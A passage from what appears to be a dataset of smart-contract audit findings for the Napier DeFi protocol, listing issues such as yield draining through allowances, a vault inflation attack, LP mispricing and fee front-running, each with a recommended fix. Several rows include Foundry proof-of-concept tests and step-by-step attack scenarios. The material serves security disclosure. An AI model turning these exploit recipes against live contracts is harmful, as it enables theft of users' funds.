tokens.\\nAfter some time, the lender harvests fees and fees are set to zero. (This step could be frontrunning the below step.)\\nThe borrower immediately takes out another loan of 100 tokens and pays and entrance fee of 10 tokens.\\nWhen fees are harvested again, due to the calculation in the code block above, 5 tokens of the entrance fee go to the first lender and 5 tokens go to the second lender. The first lender has collected 15 tokens of entrance fees, while the second lender has collected only 5- despite both loans having the same borrowed amount.\\nFurthermore, if the entrance fee is increased then new lenders will lose part of their entrance fee. Example:\\nA borrower takes a loan of 100 tokens from a lender and pays an entrance fee of 10 tokens.\\nThe entrance fee is increased.\\nThe borrower increases the position by taking a loan of 100 tokens from a new lender, and pays an entrance fee of 20 tokens.\\n`harvest()` is called, and both lenders receive 15 tokens out of the total 30 tokens paid as entrance fees. This is wrong since the first lender should receive 10 and the second lender should receive 20.","Could add the entrance fee directly to the lender's fees balance instead of adding it to feesOwed, and then track the entrance fee in the loan data to be used in min fee enforcement calculations.",Lenders are likely to lose entrance fees.,```\\n borrowing.feesOwed += entranceFee;\\n```\\n +"A borrower eligible for liquidation can pay an improperly large amount of fees, and may be unfairly liquidated",medium,"If a borrower is partially liquidated and then increases the collateral balance to avoid further liquidation, they will pay an improperly large amount of fees and can be unfairly liquidated.\\n```\\n (collateralBalance, currentFees) = _calculateCollateralBalance(\\n borrowing.borrowedAmount,\\n borrowing.accLoanRatePerSeconds,\\n borrowing.dailyRateCollateralBalance,\\n accLoanRatePerSeconds\\n );\\n // rest of code\\n if (collateralBalance > 0) {\\n // rest of code\\n } else {\\n currentFees = borrowing.dailyRateCollateralBalance; //entire collateral amount\\n }\\n // rest of code\\n borrowing.feesOwed += _pickUpPlatformFees(borrowing.holdToken, currentFees);\\n```\\n\\nWhen liquidation occurs right after becoming liquidatable, the `collateralBalance` calculation in `repay()` above will be a small value like -1; and essentially all the fees owed will be collected.\\nIf the borrower notices the partial liquidation and wishes to avoid further liquidation, `increaseCollateralBalance()` can be called to become solvent again. But since the `accLoanRatePerSeconds` wasn't updated, the borrower will have to doubly pay all the fees that were just collected. This will happen if a lender calls `harvest()` or the loan is liquidated again. The loan can also be liquidated unfairly, because the `collateralBalance` calculated above will be much lower than it should be.",Update `accLoanRatePerSeconds` for incomplete emergency liquidations.,"The borrower may pay too many fees, and it's also possible to unfairly liquidate the position.","```\\n (collateralBalance, currentFees) = _calculateCollateralBalance(\\n borrowing.borrowedAmount,\\n borrowing.accLoanRatePerSeconds,\\n borrowing.dailyRateCollateralBalance,\\n accLoanRatePerSeconds\\n );\\n // rest of code\\n if (collateralBalance > 0) {\\n // rest of code\\n } else {\\n currentFees = borrowing.dailyRateCollateralBalance; //entire collateral amount\\n }\\n // rest of code\\n borrowing.feesOwed += _pickUpPlatformFees(borrowing.holdToken, currentFees);\\n```\\n" +All yield could be drained if users set any ````> 0```` allowance to others,high,"`Tranche.redeemWithYT()` is not well implemented, all yield could be drained if users set any `> 0` allowance to others.\\nThe issue arises on L283, all `accruedInTarget` is sent out, this will not work while users have allowances to others. Let's say, alice has `1000 YT` (yield token) which has generated `100 TT` (target token), and if she approves bob `100 YT` allowance, then bob should only be allowed to take the proportional target token, which is `100 TT` * (100 YT / 1000 YT) = 10 TT.\\n```\\nFile: src\\Tranche.sol\\n function redeemWithYT(address from, address to, uint256 pyAmount) external nonReentrant returns (uint256) {\\n// rest of code\\n accruedInTarget += _computeAccruedInterestInTarget(\\n _gscales.maxscale,\\n _lscale,\\n// rest of code\\n _yt.balanceOf(from)\\n );\\n..\\n uint256 sharesRedeemed = pyAmount.divWadDown(_gscales.maxscale);\\n// rest of code\\n _target.safeTransfer(address(adapter), sharesRedeemed + accruedInTarget);\\n (uint256 amountWithdrawn, ) = adapter.prefundedRedeem(to);\\n// rest of code\\n return amountWithdrawn;\\n }\\n```\\n\\nThe following coded PoC shows all unclaimed and unaccrued target token could be drained out, even if the allowance is as low as `1wei`.\\n```\\n// SPDX-License-Identifier: MIT\\npragma solidity ^0.8.0;\\n\\nimport {TestTranche} from ""./Tranche.t.sol"";\\nimport ""forge-std/console2.sol"";\\n\\ncontract TrancheAllowanceIssue is TestTranche {\\n address bob = address(0x22);\\n function setUp() public virtual override {\\n super.setUp();\\n }\\n\\n function testTrancheAllowanceIssue() public {\\n // 1. issue some PT and YT\\n deal(address(underlying), address(this), 1_000e6, true);\\n tranche.issue(address(this), 1_000e6);\\n\\n // 2. generating some unclaimed yield\\n vm.warp(block.timestamp + 30 days);\\n _simulateScaleIncrease();\\n\\n // 3. give bob any negligible allowance, could be as low as only 1wei\\n tranche.approve(bob, 1);\\n yt.approve(bob, 1);\\n\\n // 4. all unclaimed and pending yield drained by bob\\n assertEq(0, underlying.balanceOf(bob));\\n vm.prank(bob);\\n tranche.redeemWithYT(address(this), bob, 1);\\n assertTrue(underlying.balanceOf(bob) > 494e6);\\n }\\n}\\n```\\n\\nAnd the logs:\\n```\\n2024-01-napier\\napier-v1> forge test --match-test testTrancheAllowanceIssue -vv\\n[⠔] Compiling// rest of code\\n[⠊] Compiling 42 files with 0.8.19\\n[⠔] Solc 0.8.19 finished in 82.11sCompiler run successful!\\n[⠒] Solc 0.8.19 finished in 82.11s\\n\\nRunning 1 test for test/unit/TrancheAllowanceIssue.t.sol:TrancheAllowanceIssue\\n[PASS] testTrancheAllowanceIssue() (gas: 497585)\\nTest result: ok. 1 passed; 0 failed; 0 skipped; finished in 11.06ms\\n\\nRan 1 test suites: 1 tests passed, 0 failed, 0 skipped (1 total tests)\\n```\\n","```\\ndiff // Remove the line below\\n// Remove the line below\\ngit a/napier// Remove the line below\\nv1/src/Tranche.sol b/napier// Remove the line below\\nv1/src/Tranche.sol\\nindex 62d9562..65db5c6 100644\\n// Remove the line below\\n// Remove the line below\\n// Remove the line below\\n a/napier// Remove the line below\\nv1/src/Tranche.sol\\n// Add the line below\\n// Add the line below\\n// Add the line below\\n b/napier// Remove the line below\\nv1/src/Tranche.sol\\n@@ // Remove the line below\\n275,12 // Add the line below\\n275,15 @@ contract Tranche is BaseToken, ReentrancyGuard, Pausable, ITranche {\\n delete unclaimedYields[from];\\n gscales = _gscales;\\n\\n// Add the line below\\n uint256 accruedProportional = accruedInTarget * pyAmount / _yt.balanceOf(from);\\n// Add the line below\\n unclaimedYields[from] = accruedInTarget // Remove the line below\\n accruedProportional;\\n// Add the line below\\n \\n // Burn PT and YT tokens from `from`\\n _burnFrom(from, pyAmount);\\n _yt.burnFrom(from, msg.sender, pyAmount);\\n\\n // Withdraw underlying tokens from the adapter and transfer them to the user\\n// Remove the line below\\n _target.safeTransfer(address(adapter), sharesRedeemed // Add the line below\\n accruedInTarget);\\n// Add the line below\\n _target.safeTransfer(address(adapter), sharesRedeemed // Add the line below\\n accruedProportional);\\n (uint256 amountWithdrawn, ) = adapter.prefundedRedeem(to);\\n\\n emit RedeemWithYT(from, to, amountWithdrawn);\\n```\\n",Users lost all unclaimed and unaccrued yield,"```\\nFile: src\\Tranche.sol\\n function redeemWithYT(address from, address to, uint256 pyAmount) external nonReentrant returns (uint256) {\\n// rest of code\\n accruedInTarget += _computeAccruedInterestInTarget(\\n _gscales.maxscale,\\n _lscale,\\n// rest of code\\n _yt.balanceOf(from)\\n );\\n..\\n uint256 sharesRedeemed = pyAmount.divWadDown(_gscales.maxscale);\\n// rest of code\\n _target.safeTransfer(address(adapter), sharesRedeemed + accruedInTarget);\\n (uint256 amountWithdrawn, ) = adapter.prefundedRedeem(to);\\n// rest of code\\n return amountWithdrawn;\\n }\\n```\\n" +LP Tokens always valued at 3 PTs,high,"LP Tokens are always valued at 3 PTs. As a result, users of the AMM pool might receive fewer assets/PTs than expected. The AMM pool might be unfairly arbitraged, resulting in a loss for the pool's LPs.\\nThe Napier AMM pool facilitates trade between underlying assets and PTs. The PTs in the pool are represented by the Curve's Base LP Token of the Curve's pool that holds the PTs. The Napier AMM pool and Router math assumes that the Base LP Token is equivalent to 3 times the amount of PTs, as shown below. When the pool is initially deployed, it is correct that the LP token is equivalent to 3 times the amount of PT.\\n```\\nFile: PoolMath.sol\\n int256 internal constant N_COINS = 3;\\n..SNIP..\\n function swapExactBaseLpTokenForUnderlying(PoolState memory pool, uint256 exactBaseLptIn)\\n internal\\n..SNIP..\\n // Note: Here we are multiplying by N_COINS because the swap formula is defined in terms of the amount of PT being swapped.\\n // BaseLpt is equivalent to 3 times the amount of PT due to the initial deposit of 1:1:1:1=pt1:pt2:pt3:Lp share in Curve pool.\\n exactBaseLptIn.neg() * N_COINS\\n..SNIP..\\n function swapUnderlyingForExactBaseLpToken(PoolState memory pool, uint256 exactBaseLptOut)\\n..SNIP..\\n (int256 _netUnderlyingToAccount18, int256 _netUnderlyingFee18, int256 _netUnderlyingToProtocol18) = executeSwap(\\n pool,\\n // Note: sign is defined from the perspective of the swapper.\\n // positive because the swapper is buying pt\\n exactBaseLptOut.toInt256() * N_COINS\\n```\\n\\n```\\nFile: NapierPool.sol\\n /// @dev Number of coins in the BasePool\\n uint256 internal constant N_COINS = 3;\\n..SNIP..\\n totalBaseLptTimesN: baseLptUsed * N_COINS,\\n..SNIP..\\n totalBaseLptTimesN: totalBaseLpt * N_COINS,\\n```\\n\\nIn Curve, LP tokens are generally priced by computing the underlying tokens per share, hence dividing the total underlying token amounts by the total supply of the LP token. Given that the underlying assets in Curve's stable swap are pegged to each other, the invariant's $D$ value can be computed to estimate the total value of the underlying tokens.\\nCurve itself provides a function `get_virtual_price` that computes the price of the LP token by dividing $D$ with the total supply.\\nNote that for LP tokens, the ratio of the total underlying value and the total supply will grow (fee mechanism) over time. Thus, the virtual price's value will increase over time.\\nThis means the LP token will be worth more than 3 PTs in the Curve Pool over time. However, the Naiper AMM pool still values its LP token at a constant value of 3 PTs. This discrepancy between the value of the LP tokens in the Napier AMM pool and Curve pool might result in various issues, such as the following:\\nInvestors brought LP tokens at the price of 3.X PT from the market. The LP tokens are deposited into or swap into the Napier AMM pool. The Naiper Pool will always assume that the price of the LP token is 3 PTs, thus shortchanging the number of assets or PTs returned to users.\\nPotential arbitrage opportunity where malicious users obtain the LP token from the Naiper AMM pool at a value of 3 PT and redeem the LP token at a value higher than 3 PTs, pocketing the differences.","Naiper and Pendle share the same core math for their AMM pool.\\nIn Pendle, the AMM stores the PTs and SY (Standard Yield Token). When performing any operation (e.g., deposit, swap), the SY will be converted to the underlying assets based on SY's current rate before performing any math operation. If it is a SY (wstETH), the SY's rate will be the current exchange rate for wstETH to stETH/ETH. One could also think the AMM's reserve is PTs and Underlying Assets under the hood.\\nIn Napier, the AMM stores the PTs and Curve's LP tokens. When performing any operation, the math will always convert the LP token to underlying assets using a static exchange rate of 3. However, this is incorrect, as the value of an LP token will grow over time. The AMM should value the LP tokens based on their current value. The virtual price of the LP token and other information can be leveraged to derive the current value of the LP tokens to facilitate the math operation within the pool.","Users of the AMM pool might receive fewer assets/PTs than expected. The AMM pool might be unfairly arbitraged, resulting in a loss for the pool's LPs.","```\\nFile: PoolMath.sol\\n int256 internal constant N_COINS = 3;\\n..SNIP..\\n function swapExactBaseLpTokenForUnderlying(PoolState memory pool, uint256 exactBaseLptIn)\\n internal\\n..SNIP..\\n // Note: Here we are multiplying by N_COINS because the swap formula is defined in terms of the amount of PT being swapped.\\n // BaseLpt is equivalent to 3 times the amount of PT due to the initial deposit of 1:1:1:1=pt1:pt2:pt3:Lp share in Curve pool.\\n exactBaseLptIn.neg() * N_COINS\\n..SNIP..\\n function swapUnderlyingForExactBaseLpToken(PoolState memory pool, uint256 exactBaseLptOut)\\n..SNIP..\\n (int256 _netUnderlyingToAccount18, int256 _netUnderlyingFee18, int256 _netUnderlyingToProtocol18) = executeSwap(\\n pool,\\n // Note: sign is defined from the perspective of the swapper.\\n // positive because the swapper is buying pt\\n exactBaseLptOut.toInt256() * N_COINS\\n```\\n" +Victim's fund can be stolen due to rounding error and exchange rate manipulation,high,"Victim's funds can be stolen by malicious users by exploiting the rounding error and through exchange rate manipulation.\\nThe LST Adaptor attempts to guard against the well-known vault inflation attack by reverting the TX when the amount of shares minted is rounded down to zero in Line 78 below.\\n```\\nFile: BaseLSTAdapter.sol\\n function prefundedDeposit() external nonReentrant returns (uint256, uint256) {\\n uint256 bufferEthCache = bufferEth; // cache storage reads\\n uint256 queueEthCache = withdrawalQueueEth; // cache storage reads\\n uint256 assets = IWETH9(WETH).balanceOf(address(this)) - bufferEthCache; // amount of WETH deposited at this time\\n uint256 shares = previewDeposit(assets);\\n\\n if (assets == 0) return (0, 0);\\n if (shares == 0) revert ZeroShares();\\n```\\n\\nHowever, this control alone is not sufficient to guard against vault inflation attacks.\\nLet's assume the following scenario (ignoring fee for simplicity's sake):\\nThe victim initiates a transaction that deposits 10 ETH as the underlying asset when there are no issued estETH shares.\\nThe attacker observes the victim's transaction and deposits 1 wei of ETH (issuing 1 wei of estETH share) before the victim's transaction. 1 wei of estETH share worth of PT and TY will be minted to the attacker.\\nThen, the attacker executes a transaction to directly transfer 5 stETH to the adaptor. The exchange rate at this point is `1 wei / (5 ETH + 1 wei)`. Note that the `totalAssets` function uses the `balanceOf` function to compute the total underlying assets owned by the adaptor. Thus, this direct transfer will increase the total assets amount.\\nWhen the victim's transaction is executed, the number of estETH shares issued is calculated as 10 ETH * `1 wei / (5 ETH + 1 wei)`, resulting in 1 wei being issued due to round-down.\\nThe attacker will combine the PT + YT obtained earlier to redeem 1 wei of estETH share from the adaptor.\\nThe attacker, holding 50% of the issued estETH shares (indirectly via the PT+YT he owned), receives `(15 ETH + 1 wei) / 2` as the underlying asset.\\nThe attacker seizes 25% of the underlying asset (2.5 ETH) deposited by the victim.\\nThis scenario demonstrates that even when a revert is triggered due to the number of issued estETH share being 0, it does not prevent the attacker from capturing the user's funds through exchange rate manipulation.",Following are some of the measures that could help to prevent such an attack:\\nMint a certain amount of shares to zero address (dead address) during contract deployment (similar to what has been implemented in Uniswap V2)\\nAvoid using the `balanceOf` so that malicious users cannot transfer directly to the contract to increase the assets per share. Track the total assets internally via a variable.,Loss of assets for the victim.,"```\\nFile: BaseLSTAdapter.sol\\n function prefundedDeposit() external nonReentrant returns (uint256, uint256) {\\n uint256 bufferEthCache = bufferEth; // cache storage reads\\n uint256 queueEthCache = withdrawalQueueEth; // cache storage reads\\n uint256 assets = IWETH9(WETH).balanceOf(address(this)) - bufferEthCache; // amount of WETH deposited at this time\\n uint256 shares = previewDeposit(assets);\\n\\n if (assets == 0) return (0, 0);\\n if (shares == 0) revert ZeroShares();\\n```\\n" +Anyone can convert someone's unclaimed yield to PT + YT,medium,"Anyone can convert someone's unclaimed yield to PT + YT, leading to a loss of assets for the victim.\\nAssume that Alice has accumulated 100 Target Tokens in her account's unclaimed yields. She is only interested in holding the Target token (e.g., she is might be long Target token). She intends to collect those Target Tokens sometime later.\\nBob could disrupt Alice's plan by calling `issue` function with the parameter (to=Alice, underlyingAmount=0). The function will convert all 100 Target Tokens stored within Alice's account's unclaimed yield to PT + YT and send them to her, which Alice does not want or need in the first place.\\nLine 196 below will clear Alice's entire unclaimed yield before computing the accrued interest at Line 203. The accrued interest will be used to mint the PT and YT (Refer to Line 217 and Line 224 below).\\n```\\nFile: Tranche.sol\\n function issue(\\n address to,\\n uint256 underlyingAmount\\n ) external nonReentrant whenNotPaused notExpired returns (uint256 issued) {\\n..SNIP..\\n lscales[to] = _maxscale;\\n delete unclaimedYields[to];\\n\\n uint256 yBal = _yt.balanceOf(to);\\n // If recipient has unclaimed interest, claim it and then reinvest it to issue more PT and YT.\\n // Reminder: lscale is the last scale when the YT balance of the user was updated.\\n if (_lscale != 0) {\\n accruedInTarget += _computeAccruedInterestInTarget(_maxscale, _lscale, yBal);\\n }\\n..SNIP..\\n uint256 sharesUsed = sharesMinted + accruedInTarget;\\n uint256 fee = sharesUsed.mulDivUp(issuanceFeeBps, MAX_BPS);\\n issued = (sharesUsed - fee).mulWadDown(_maxscale);\\n\\n // Accumulate issueance fee in units of target token\\n issuanceFees += fee;\\n // Mint PT and YT to user\\n _mint(to, issued);\\n _yt.mint(to, issued);\\n```\\n\\nThe market value of the PT + YT might be lower than the market value of the Target Token. In this case, Alice will lose due to Bob's malicious action.\\nAnother `issue` is that when Bob calls `issue` function on behalf of Alice's account, the unclaimed target tokens will be subjected to the issuance fee (See Line 218 above). Thus, even if the market value of PT + YT is exactly the same as that of the Target Token, Alice is still guaranteed to suffer a loss from Bob's malicious action.\\nIf Alice had collected the unclaimed yield via the collect function, she would have received the total value of the yield in the underlying asset terms, as a collection of yield is not subjected to any fee.",Consider not allowing anyone to issue PY+YT on behalf of someone's account.,Loss of assets for the victim.,"```\\nFile: Tranche.sol\\n function issue(\\n address to,\\n uint256 underlyingAmount\\n ) external nonReentrant whenNotPaused notExpired returns (uint256 issued) {\\n..SNIP..\\n lscales[to] = _maxscale;\\n delete unclaimedYields[to];\\n\\n uint256 yBal = _yt.balanceOf(to);\\n // If recipient has unclaimed interest, claim it and then reinvest it to issue more PT and YT.\\n // Reminder: lscale is the last scale when the YT balance of the user was updated.\\n if (_lscale != 0) {\\n accruedInTarget += _computeAccruedInterestInTarget(_maxscale, _lscale, yBal);\\n }\\n..SNIP..\\n uint256 sharesUsed = sharesMinted + accruedInTarget;\\n uint256 fee = sharesUsed.mulDivUp(issuanceFeeBps, MAX_BPS);\\n issued = (sharesUsed - fee).mulWadDown(_maxscale);\\n\\n // Accumulate issueance fee in units of target token\\n issuanceFees += fee;\\n // Mint PT and YT to user\\n _mint(to, issued);\\n _yt.mint(to, issued);\\n```\\n" +`withdraw` function does not comply with ERC5095,medium,"The `withdraw` function of Tranche/PT does not comply with ERC5095 as it does not return the exact amount of underlying assets requested by the users.\\nQ: Is the code/contract expected to comply with any EIPs? Are there specific assumptions around adhering to those EIPs that Watsons should be aware of? EIP20 and IERC5095\\nFollowing is the specification of the `withdraw` function of ERC5095. It stated that the user must receive exactly `underlyingAmount` of underlying tokens.\\nwithdraw Burns principalAmount from holder and sends exactly underlyingAmount of underlying tokens to receiver.\\nHowever, the `withdraw` function does not comply with this requirement.\\nOn a high-level, the reason is that Line 337 will compute the number of shares that need to be redeemed to receive `underlyingAmount` number of underlying tokens from the adaptor. The main problem here is that the division done here is rounded down. Thus, the `sharesRedeem` will be lower than expected. Consequently, when `sharesRedeem` number of shares are redeemed at Line 346 below, the users will not receive an exact number of `underlyingAmount` of underlying tokens.\\n```\\nFile: Tranche.sol\\n function withdraw(\\n uint256 underlyingAmount,\\n address to,\\n address from\\n ) external override nonReentrant expired returns (uint256) {\\n GlobalScales memory _gscales = gscales;\\n uint256 cscale = _updateGlobalScalesCache(_gscales);\\n\\n // Compute the shares to be redeemed\\n uint256 sharesRedeem = underlyingAmount.divWadDown(cscale);\\n uint256 principalAmount = _computePrincipalTokenRedeemed(_gscales, sharesRedeem);\\n\\n // Update the global scales\\n gscales = _gscales;\\n // Burn PT tokens from `from`\\n _burnFrom(from, principalAmount);\\n // Withdraw underlying tokens from the adapter and transfer them to `to`\\n _target.safeTransfer(address(adapter), sharesRedeem);\\n (uint256 underlyingWithdrawn, ) = adapter.prefundedRedeem(to);\\n```\\n",Update the `withdraw` function to send exactly `underlyingAmount` number of underlying tokens to the caller so that the Tranche will be aligned with the ERC5095 specification.,The tranche/PT does not align with the ERC5095 specification.,"```\\nFile: Tranche.sol\\n function withdraw(\\n uint256 underlyingAmount,\\n address to,\\n address from\\n ) external override nonReentrant expired returns (uint256) {\\n GlobalScales memory _gscales = gscales;\\n uint256 cscale = _updateGlobalScalesCache(_gscales);\\n\\n // Compute the shares to be redeemed\\n uint256 sharesRedeem = underlyingAmount.divWadDown(cscale);\\n uint256 principalAmount = _computePrincipalTokenRedeemed(_gscales, sharesRedeem);\\n\\n // Update the global scales\\n gscales = _gscales;\\n // Burn PT tokens from `from`\\n _burnFrom(from, principalAmount);\\n // Withdraw underlying tokens from the adapter and transfer them to `to`\\n _target.safeTransfer(address(adapter), sharesRedeem);\\n (uint256 underlyingWithdrawn, ) = adapter.prefundedRedeem(to);\\n```\\n" +Permissioned rebalancing functions leading to loss of assets,medium,"Permissioned rebalancing functions that could only be accessed by admin could lead to a loss of assets.\\nPer the contest's README page, it stated that the admin/owner is ""RESTRICTED"". Thus, any finding showing that the owner/admin can steal a user's funds, cause loss of funds or harm to the users, or cause the user's fund to be struck is valid in this audit contest.\\nQ: Is the admin/owner of the protocol/contracts TRUSTED or RESTRICTED?\\nRESTRICTED\\nThe following describes a way where the admin can block users from withdrawing their assets from the protocol\\nThe admin calls the `setRebalancer` function to set the rebalance to a wallet address owned by them.\\n```\\nFile: BaseLSTAdapter.sol\\n function setRebalancer(address _rebalancer) external onlyOwner {\\n rebalancer = _rebalancer;\\n }\\n```\\n\\nThe admin calls the `setTargetBufferPercentage` the set the `targetBufferPercentage` to the smallest possible value of 1%. This will cause only 1% of the total ETH deposited by all the users to reside on the adaptor contract. This will cause the ETH buffer to deplete quickly and cause all the redemption and withdrawal to revert.\\n```\\nFile: BaseLSTAdapter.sol\\n function setTargetBufferPercentage(uint256 _targetBufferPercentage) external onlyRebalancer {\\n if (_targetBufferPercentage < MIN_BUFFER_PERCENTAGE || _targetBufferPercentage > BUFFER_PERCENTAGE_PRECISION) {\\n revert InvalidBufferPercentage();\\n }\\n targetBufferPercentage = _targetBufferPercentage;\\n }\\n```\\n\\nThe owner calls the `setRebalancer` function again and sets the rebalancer address to `address(0)`. As such, no one has the ability to call functions that are only accessible by rebalancer. The `requestWithdrawal` and `requestWithdrawalAll` functions are only accessible by rebalancer. Thus, no one can call these two functions to replenish the ETH buffer in the adaptor contract.\\nWhen this state is reached, users can no longer withdraw their assets from the protocol, and their assets are stuck in the contract. This effectively causes them to lose their assets.","To prevent the above scenario, the minimum `targetBufferPercentage` should be set to a higher percentage such as 5 or 10%, and the `requestWithdrawal` function should be made permissionless, so that even if the rebalancer does not do its job, anyone else can still initiate the rebalancing process to replenish the adaptor's ETH buffer for user's withdrawal.",Loss of assets for the victim.,```\\nFile: BaseLSTAdapter.sol\\n function setRebalancer(address _rebalancer) external onlyOwner {\\n rebalancer = _rebalancer;\\n }\\n```\\n +Unable to deposit to Tranche/Adaptor under certain conditions,medium,"Minting of PT and YT is the core feature of the protocol. Without the ability to mint PT and YT, the protocol would not operate.\\nThe user cannot deposit into the Tranche to issue new PT + YT under certain conditions.\\nThe comment in Line 133 below mentioned that the `stakeAmount` can be zero.\\nThe reason is that when `targetBufferEth < (availableEth + queueEthCache)`, it is possible that there is a pending withdrawal request (queueEthCache) and no available ETH left in the buffer (availableEth = 0). Refer to the comment in Line 123 below.\\nAs a result, the code at Line 127 below will restrict the amount of ETH to be staked and set the `stakeAmount` to zero.\\n```\\nFile: BaseLSTAdapter.sol\\n function prefundedDeposit() external nonReentrant returns (uint256, uint256) {\\n..SNIP..\\n uint256 stakeAmount;\\n unchecked {\\n stakeAmount = availableEth + queueEthCache - targetBufferEth; // non-zero, no underflow\\n }\\n // If the stake amount exceeds 95% of the available ETH, cap the stake amount.\\n // This is to prevent the buffer from being completely drained. This is not a complete solution.\\n //\\n // The condition: stakeAmount > availableEth, is equivalent to: queueEthCache > targetBufferEth\\n // Possible scenarios:\\n // - Target buffer percentage was changed to a lower value and there is a large withdrawal request pending.\\n // - There is a pending withdrawal request and the available ETH are not left in the buffer.\\n // - There is no pending withdrawal request and the available ETH are not left in the buffer.\\n uint256 maxStakeAmount = (availableEth * 95) / 100;\\n if (stakeAmount > maxStakeAmount) {\\n stakeAmount = maxStakeAmount; // max 95% of the available ETH\\n }\\n\\n /// INTERACT ///\\n // Deposit into the yield source\\n // Actual amount of ETH spent may be less than the requested amount.\\n stakeAmount = _stake(stakeAmount); // stake amount can be 0\\n```\\n\\nHowever, the issue is that when `_stake` function is called with `stakeAmount` set to zero, it will result in zero ETH being staked and Line 77 below will revert.\\n```\\nFile: StEtherAdapter.sol\\n /// @inheritdoc BaseLSTAdapter\\n /// @dev Lido has a limit on the amount of ETH that can be staked.\\n /// @dev Need to check the current staking limit before staking to prevent DoS.\\n function _stake(uint256 stakeAmount) internal override returns (uint256) {\\n uint256 stakeLimit = STETH.getCurrentStakeLimit();\\n if (stakeAmount > stakeLimit) {\\n // Cap stake amount\\n stakeAmount = stakeLimit;\\n }\\n\\n IWETH9(Constants.WETH).withdraw(stakeAmount);\\n uint256 _stETHAmt = STETH.submit{value: stakeAmount}(address(this));\\n\\n if (_stETHAmt == 0) revert InvariantViolation();\\n return stakeAmount;\\n }\\n```\\n\\nA similar issue also occurs for the sFRXETH adaptor. If `FRXETH_MINTER.submit` function is called with `stakeAmount == 0`, it will revert.\\n```\\nFile: SFrxETHAdapter.sol\\n /// @notice Mint sfrxETH using WETH\\n function _stake(uint256 stakeAmount) internal override returns (uint256) {\\n IWETH9(Constants.WETH).withdraw(stakeAmount);\\n FRXETH_MINTER.submit{value: stakeAmount}();\\n uint256 received = STAKED_FRXETH.deposit(stakeAmount, address(this));\\n if (received == 0) revert InvariantViolation();\\n\\n return stakeAmount;\\n }\\n```\\n\\nThe following shows that the `FRXETH_MINTER.submit` function will revert if submitted ETH is zero below.\\n```\\n/// @notice Mint frxETH to the recipient using sender's funds. Internal portion\\nfunction _submit(address recipient) internal nonReentrant {\\n // Initial pause and value checks\\n require(!submitPaused, ""Submit is paused"");\\n require(msg.value != 0, ""Cannot submit 0"");\\n```\\n","Short-circuit the `_stake` function by returning zero value immediately if the `stakeAmount` is zero.\\nFile: StEtherAdapter.sol\\n```\\nfunction _stake(uint256 stakeAmount) internal override returns (uint256) {\\n// Add the line below\\n if (stakeAmount == 0) return 0; \\n uint256 stakeLimit = STETH.getCurrentStakeLimit();\\n if (stakeAmount > stakeLimit) {\\n // Cap stake amount\\n stakeAmount = stakeLimit;\\n }\\n\\n IWETH9(Constants.WETH).withdraw(stakeAmount);\\n uint256 _stETHAmt = STETH.submit{value: stakeAmount}(address(this));\\n\\n if (_stETHAmt == 0) revert InvariantViolation();\\n return stakeAmount;\\n}\\n```\\n\\nFile: SFrxETHAdapter.sol\\n```\\nfunction _stake(uint256 stakeAmount) internal override returns (uint256) {\\n// Add the line below\\n if (stakeAmount == 0) return 0; \\n IWETH9(Constants.WETH).withdraw(stakeAmount);\\n FRXETH_MINTER.submit{value: stakeAmount}();\\n uint256 received = STAKED_FRXETH.deposit(stakeAmount, address(this));\\n if (received == 0) revert InvariantViolation();\\n\\n return stakeAmount;\\n}\\n```\\n","Minting of PT and YT is the core feature of the protocol. Without the ability to mint PT and YT, the protocol would not operate. The user cannot deposit into the Tranche to issue new PT + YT under certain conditions. Breaking of core protocol/contract functionality.","```\\nFile: BaseLSTAdapter.sol\\n function prefundedDeposit() external nonReentrant returns (uint256, uint256) {\\n..SNIP..\\n uint256 stakeAmount;\\n unchecked {\\n stakeAmount = availableEth + queueEthCache - targetBufferEth; // non-zero, no underflow\\n }\\n // If the stake amount exceeds 95% of the available ETH, cap the stake amount.\\n // This is to prevent the buffer from being completely drained. This is not a complete solution.\\n //\\n // The condition: stakeAmount > availableEth, is equivalent to: queueEthCache > targetBufferEth\\n // Possible scenarios:\\n // - Target buffer percentage was changed to a lower value and there is a large withdrawal request pending.\\n // - There is a pending withdrawal request and the available ETH are not left in the buffer.\\n // - There is no pending withdrawal request and the available ETH are not left in the buffer.\\n uint256 maxStakeAmount = (availableEth * 95) / 100;\\n if (stakeAmount > maxStakeAmount) {\\n stakeAmount = maxStakeAmount; // max 95% of the available ETH\\n }\\n\\n /// INTERACT ///\\n // Deposit into the yield source\\n // Actual amount of ETH spent may be less than the requested amount.\\n stakeAmount = _stake(stakeAmount); // stake amount can be 0\\n```\\n" +Napier pool owner can unfairly increase protocol fees on swaps to earn more revenue,medium,"Currently there is no limit to how often a `poolOwner` can update fees which can be abused to earn more fees by charging users higher swap fees than they expect.\\nThe `NapierPool::setFeeParameter` function allows the `poolOwner` to set the `protocolFeePercent` at any point to a maximum value of 100%. The `poolOwner` is a trusted party but should not be able to abuse protocol settings to earn more revenue. There are no limits to how often this can be updated.\\n```\\n function test_protocol_owner_frontRuns_swaps_with_higher_fees() public whenMaturityNotPassed {\\n // pre-condition\\n vm.warp(maturity - 30 days);\\n deal(address(pts[0]), alice, type(uint96).max, false); // ensure alice has enough pt\\n uint256 preBaseLptSupply = tricrypto.totalSupply();\\n uint256 ptInDesired = 100 * ONE_UNDERLYING;\\n uint256 expectedBaseLptIssued = tricrypto.calc_token_amount([ptInDesired, 0, 0], true);\\n\\n // Pool owner sees swap about to occur and front runs updating fees to max value\\n vm.startPrank(owner);\\n pool.setFeeParameter(""protocolFeePercent"", 100);\\n vm.stopPrank();\\n\\n // execute\\n vm.prank(alice);\\n uint256 underlyingOut = pool.swapPtForUnderlying(\\n 0, ptInDesired, recipient, abi.encode(CallbackInputType.SwapPtForUnderlying, SwapInput(underlying, pts[0]))\\n );\\n // sanity check\\n uint256 protocolFee = SwapEventsLib.getProtocolFeeFromLastSwapEvent(pool);\\n assertGt(protocolFee, 0, ""fee should be charged"");\\n }\\n```\\n",Introduce a delay in fee updates to ensure users receive the fees they expect.,A malicious `poolOwner` could change the protocol swap fees unfairly for users by front-running swaps and increasing fees to higher values on unsuspecting users. An example scenario is:\\nThe `poolOwner` sets swap fees to 1% to attract users\\nThe `poolOwner` front runs all swaps and changes the swap fees to the maximum value of 100%\\nAfter the swap the `poolOwner` resets `protocolFeePercent` to a low value to attract more users,"```\\n function test_protocol_owner_frontRuns_swaps_with_higher_fees() public whenMaturityNotPassed {\\n // pre-condition\\n vm.warp(maturity - 30 days);\\n deal(address(pts[0]), alice, type(uint96).max, false); // ensure alice has enough pt\\n uint256 preBaseLptSupply = tricrypto.totalSupply();\\n uint256 ptInDesired = 100 * ONE_UNDERLYING;\\n uint256 expectedBaseLptIssued = 